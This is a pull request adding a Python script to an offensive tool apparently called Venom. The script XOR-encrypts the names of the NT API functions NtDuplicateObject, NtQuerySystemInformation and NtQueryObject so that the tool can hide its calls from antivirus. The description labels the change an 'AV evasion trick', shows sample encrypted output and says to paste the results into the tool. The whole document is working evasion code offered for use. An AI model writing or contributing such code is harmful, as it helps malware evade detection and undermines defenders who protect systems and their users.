### PR TITLE
AV evasion trick: function call obfuscation XOR

### DIFF
--- a/Venom/Venom-enc.py
+++ b/Venom/Venom-enc.py
@@ -1,0 +1,41 @@
+# XOR encrypt (for NT API function names)
+import sys
+import os
+import hashlib
+import string
+import random
+
+## XOR function to encrypt data
+def xor(data, key):
+    key = str(key)
+    l = len(key)
+    output_str = ""
+
+    for i in range(len(data)):
+        current = data[i]
+        current_key = key[i % len(key)]
+        ordd = lambda x: x if isinstance(x, int) else ord(x)
+        output_str += chr(ordd(current) ^ ord(current_key))
+    return output_str
+
+## encrypting
+def xor_encrypt(data, key):
+    ciphertext = xor(data, key)
+    ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
+    print (ciphertext, key)
+    return ciphertext, key
+
+## key for encrypt/decrypt
+nt_duplicate_object = "NtDuplicateObject"
+nt_query_sys_info = "NtQuerySystemInformation"
+nt_query_obj = "NtQueryObject"
+
+length = random.randint(16, 32)
+my_secret_key = ''.join(random.choice(string.ascii_letters) for i in range(length))
+
+## encrypt NT DLL functions
+e_nt_duplicate_object, p_key = xor_encrypt(nt_duplicate_object, my_secret_key)
+e_nt_query_sys_info, p_key = xor_encrypt(nt_query_sys_info, my_secret_key)
+e_nt_query_obj, p_key = xor_encrypt(nt_query_obj, my_secret_key)
+
+


### PR DESCRIPTION
AV evasion: add function call obfuscation trick [https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html](https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.htmll)

Run VenomEnc.py:

```bash
python3 VenomEnc.py
```

```bash
{ 0x16, 0x11, 0x12, 0x14, 0x3e, 0x2, 0xf, 0x14, 0x8, 0x22, 0x3f, 0x0, 0xe, 0x18, 0xc, 0x4, 0x37 }; XeVaNnfwiVZOlrigCZYM
{ 0x16, 0x11, 0x7, 0x14, 0x2b, 0x1c, 0x1f, 0x24, 0x10, 0x25, 0x2e, 0x2a, 0x1, 0x3b, 0x7, 0x1, 0x2c, 0x28, 0x34, 0x2c, 0x2c, 0xc, 0x39, 0xf }; XeVaNnfwiVZOlrigCZYM
{ 0x16, 0x11, 0x7, 0x14, 0x2b, 0x1c, 0x1f, 0x38, 0xb, 0x3c, 0x3f, 0x2c, 0x18 }; XeVaNnfwiVZOlrigCZYM
```

Then, paste encrypted function names for NtDuplicateObject, NtQuerySystemInformation, NtQueryObject and XOR key.